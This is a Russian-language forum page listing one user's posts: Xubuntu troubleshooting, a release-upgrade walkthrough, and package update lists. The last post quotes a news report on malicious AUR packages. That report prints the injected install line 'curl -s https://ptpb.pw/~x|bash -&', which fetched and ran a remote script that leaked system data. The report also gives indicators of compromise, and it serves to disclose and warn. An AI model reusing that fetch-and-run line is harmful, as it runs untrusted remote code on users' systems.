- +

Просмотр сообщений

В этом разделе можно просмотреть все сообщения, сделанные этим пользователем.


Сообщения - denkin

Страницы: [1] 2 3 ... 100
1
2.
sudo apt update && sudo apt install linux-firmware
или установит или скажет, что уже установлено.

что говорит
uname -r
???

2
1. Можно перезапускать только сетевую службу:
sudo service network-manager restart
2. Проверить: установлен ли пакет linux-firmware ?

А какая версия Xubuntu?

3
Обновляется 12 и 3 новых пакета будет установлено в среду вечером:
НОВІ пакунки, які будуть встановлені:
  cryptsetup-initramfs cryptsetup-run libboost-date-time1.67.0
Пакунки, які будуть ОНОВЛЕНІ:
  cryptsetup cryptsetup-bin libcmis-0.5-5v5 libcryptsetup12
  libhdf4-0-alt libltdl7 libnpth0 libsidplayfp4
  python3-software-properties qttranslations5-l10n
  software-properties-common software-properties-gtk

4
Очевидно проблема не в Xubuntu а в программе

5
1. Установить на панель Менеджер раскладок клавиатуры, если еще не установлен:
ПКМ на панели > Панель > Добавить новые элементы > Раскладки клавиатуры > Добавить
2. ПКМ на Менеджере раскладок > Свойства > Поведение
там настройка

6
...
Как посмотреть все горячие клавиши в xubuntu?
Менеджер параметров > Менеджер окон > Клавиатура
Менеджер параметров > Клавиатура > Ярлыки программ

7
33 пакета обновляется вечером во вторник:
espeak-ng-data gir1.2-polkit-1.0 guile-2.0-libs inxi
  libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-system1.62.0 libboost-thread1.62.0
  libespeak-ng1 libharfbuzz-icu0 libharfbuzz0b libinput-bin libinput10
  liblmdb0 libpolkit-agent-1-0 libpolkit-backend-1-0
  libpolkit-gobject-1-0 libservlet3.1-java libsuperlu5 libva-drm2
  libva-wayland2 libva-x11-2 libva2 libwww-perl lintian make netplan.io
  nplan policykit-1 sgml-data snapd va-driver-all
inxi (3.0.18-1-1 вместо 3.0.15-1-1), в том числе.

8
...
Мне нравится этот вариант, я многому научусь в процессе. Можете примерно объяснить процесс?
...
В вашем случае можно обновится относительно просто:
1. Заменить название дистрибутива в источниках программ:
sudo sed -i 's/artful/bionic/g' /etc/apt/sources.list
2. Обновить информацию о пакетах:
sudo apt update
3. Обновиться:
sudo apt full-upgrade
4. Обновить версии программ (скорее всего ничего не обновится, но на всякий случай):
sudo apt dist-upgrade
До сих пор вы просто обновлялись с 17.10 до 18.04, теперь установим xfce4.
5. СПОСОБ 1, установка только рабочего окружения, ничего лишнего:
sudo apt install xubuntu-core
5. СПОСОБ 2, полная установка окружения с дополинтельными программами (советую пока этот вариант):
sudo apt install xubuntu-desktop
6. Выйти из сеанса пользователя, выбрать в окне логина сеанс xubuntu-session, зайти, наслаждаться.

9
Вообще то вариантов масса, начиная с того что просто обновиться на 18.04 и доустановить рабочий стол xfce4, а затем выбрать сеанс xubuntu при входе в систему, тогда не придется возиться с флешкой.
Что касается флешки, то для начала вопросы: на чем запускаете? BIOS или UEFI?

10
Создайте флешку штатной утилитой usb-creator-gtk

11
27 пакетов обновляется утром в субботу:
busybox-initramfs busybox-static cups cups-bsd cups-client cups-common
  cups-core-drivers cups-daemon cups-ipp-utils cups-ppdc
  cups-server-common libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-system1.62.0 libboost-thread1.62.0
  libcups2 libcupscgi1 libcupsimage2 libcupsmime1 libcupsppdc1 libraw16
  python3-distupgrade ubuntu-release-upgrader-core
  ubuntu-release-upgrader-gtk ubuntu-release-upgrader-qt
  unattended-upgrades
сервер печати cups 2.2.7-1 в том числе.

13
22 пакета обновляется и 1 новый будет установлен вечером в четверг:
НОВІ пакунки, які будуть встановлені:
  libargon2-1
Пакунки, які будуть ОНОВЛЕНІ:
  cryptsetup cryptsetup-bin libargon2-0 libaudit-common libaudit1
  libcryptsetup12 libgcrypt20 libobrender32v5 libobt2v5
  libpulse-mainloop-glib0 libpulse0 libpulsedsp libtomcrypt1
  libvolume-key1 openbox pulseaudio pulseaudio-module-bluetooth
  pulseaudio-utils python-html5lib python3-dbus.mainloop.pyqt5
  python3-pil python3-pyqt5

14
22 пакета обновляется вечером в среду:
chromium-codecs-ffmpeg-extra imagemagick imagemagick-6-common
  imagemagick-6.q16 libbasicusageenvironment1 libcaja-extension1
  libgroupsock8 libimage-magick-perl libimage-magick-q16-perl
  libkpathsea6 liblivemedia62 libmagick++-6.q16-7 libmagickcore-6.q16-3
  libmagickcore-6.q16-3-extra libmagickwand-6.q16-3 libogdi3.2
  libusageenvironment3 libxfce4util-bin libxfce4util-common
  libxfce4util7 lshw opera-stable
в том числе chromium-codecs-ffmpeg-extra (67.0.3396.99 вместо 67.0.3396.62) и opera-stable (54.0.2952.54 вместо 54.0.2952.51), надеюсь флеш в опере не отвалится снова.
Не отвалился)))

15
Цитировать
В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).
Новость на Opennet.

Страницы: [1] 2 3 ... 100